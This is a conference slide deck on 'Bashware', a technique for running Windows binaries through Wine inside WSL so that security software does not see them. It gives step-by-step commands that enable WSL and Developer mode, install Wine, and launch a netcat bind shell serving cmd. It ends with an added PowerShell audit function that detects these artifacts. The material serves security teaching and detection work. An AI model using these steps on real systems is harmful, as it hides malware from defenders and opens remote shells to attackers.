Executing Windows Malware through WSL (Bashware)
419 views

Published on

A quick talk on executing Windows binaries using Wine in WSL. This allows for a sort of hidden process execution.

Published in: Software

  1. Bashware: A malware execution technique
  2. /usr/bin/who
     • null and OWASP Bangalore chapter leader
     • A decade of security experience in various technologies
     • Security researcher and evangelist
     • Speaker and trainer at several security conferences
     • https://ibreak.software
     • @riyazwalikar | @wincmdfu
  3. What is Bashware?
     • A technique researched by Check Point Security that can be used by malware to run using the Windows Subsystem for Linux (WSL) and not be detected by security solutions (like AV etc.)
     • Basically a way to run PE executables using the WSL
     • Bash + (mal)ware
  4. Back to Basics
     • How does malware (pick any) infect a Windows machine?
     • How is it detected? Any examples of detection techniques?
  5. An overview of WSL
     • WSL is a collection of components that enables native Linux ELF64 binaries to run on Windows. It contains both user mode and kernel mode components. It is primarily comprised of:
     • User mode session manager service that handles the Linux instance life cycle
     • Pico provider drivers (lxss.sys, lxcore.sys) that emulate a Linux kernel by translating Linux syscalls
     • Pico processes that host the unmodified user mode Linux (e.g. /bin/bash)
  6. Demo of WSL
  7. Bashware Video Demo
     • https://www.youtube.com/watch?v=fwEQFMbHIV8
  8. Let’s build a PoC!
  9. According to the video/blogpost
     • Enable WSL
     • Enable Developer mode
     • Install Linux components
     • Install WineHQ
     • Run Windows binary through Wine
  10. Step 1: Enable WSL
     dism /Online /Enable-Feature /All /FeatureName:Microsoft-Windows-Subsystem-Linux /NoRestart
     Enable-WindowsOptionalFeature -O -F Microsoft-Windows-Subsystem-Linux
  11. Step 2: Enable Developer mode
     • Set the following registry values
     [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\AppModelUnlock]
     "AllowAllTrustedApps"=dword:1
     "AllowDevelopmentWithoutDevLicense"=dword:1
  12. Step 3: Install Linux components
     • lxrun /install /y
  13. Step 4: Install Wine
     dpkg --add-architecture i386
     add-apt-repository -y ppa:ubuntu-wine/ppa
     apt-get update
     apt-get install wine1.6-amd64
  14. Step 5: Run PE binary using wine
     wine64 nc64.exe -lvp 1337 -e cmd
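Slide 4 asks how this would be detected, and steps 1 to 5 list exactly the host changes the technique needs; the PowerShell audit below, an added example that is not part of the talk or of Check Point's research, checks a host for those same artifacts (the two AppModelUnlock values, the WSL optional feature, the lxss/lxcore Pico drivers, and a running Wine process) and returns each hit as an object that can be forwarded to a SIEM. It assumes an elevated session on a Windows 10 build using the WSL 1 Pico-process model the overview slide describes; the function name Get-BashwareIndicators is my own.

```powershell
# Added example, not from the talk: audit a Windows host for the artifacts that
# steps 1, 2 and 5 of the deck leave behind. Run elevated (needed for the DISM cmdlet).
function Get-BashwareIndicators {
    $findings = New-Object System.Collections.Generic.List[object]

    # Step 2 of the deck sets these two values under AppModelUnlock to enable Developer mode.
    $unlockKey = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\AppModelUnlock'
    $unlock = Get-ItemProperty -Path $unlockKey -ErrorAction SilentlyContinue
    foreach ($name in 'AllowDevelopmentWithoutDevLicense', 'AllowAllTrustedApps') {
        if ($unlock -and $unlock.$name -eq 1) {
            $findings.Add([pscustomobject]@{ Check = 'Developer mode'; Evidence = "$unlockKey\$name = 1" })
        }
    }

    # Step 1 enables the optional feature; State reads 'Enabled' once dism or
    # Enable-WindowsOptionalFeature has run.
    $wsl = Get-WindowsOptionalFeature -Online -FeatureName Microsoft-Windows-Subsystem-Linux -ErrorAction SilentlyContinue
    if ($wsl -and $wsl.State -eq 'Enabled') {
        $findings.Add([pscustomobject]@{ Check = 'WSL feature'; Evidence = "State = $($wsl.State)" })
    }

    # The Pico provider drivers named on the WSL overview slide are running only while WSL is in use.
    foreach ($drv in Get-CimInstance Win32_SystemDriver) {
        if ($drv.PathName -match 'lx(ss|core)\.sys$' -and $drv.State -eq 'Running') {
            $findings.Add([pscustomobject]@{ Check = 'Pico driver'; Evidence = $drv.PathName })
        }
    }

    # Step 5 hands the PE to wine64. The Pico process still appears in the NT process list,
    # so a Wine process name, or a command line passing an .exe to wine, is a strong signal on a Windows host.
    foreach ($proc in Get-CimInstance Win32_Process) {
        if ($proc.Name -match '^wine(64|server)?$' -or $proc.CommandLine -match '\bwine(64)?\s+\S+\.exe\b') {
            $findings.Add([pscustomobject]@{ Check = 'Wine process'; Evidence = "PID $($proc.ProcessId): $($proc.Name) $($proc.CommandLine)" })
        }
    }

    return $findings
}

Get-BashwareIndicators | Format-Table -AutoSize
```

The driver check is specific to WSL 1, where lxss.sys and lxcore.sys translate syscalls in the NT kernel; WSL 2 runs a real Linux kernel in a lightweight VM, so on those builds only the registry, feature and process checks apply.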
  15. Demo
  16. Riyaz Walikar
     • https://ibreak.software
     • @riyazwalikar | @wincmdfu
  17. References
     • https://research.checkpoint.com/beware-bashware-new-method-malware-bypass-security-solutions/
     • https://www.youtube.com/watch?v=fwEQFMbHIV8
     • https://blogs.msdn.microsoft.com/wsl/2016/04/22/windows-subsystem-for-linux-overview/
     • https://ibreak.software/executing-windows-malware-in-windows-subsystem-for-linux-bashware/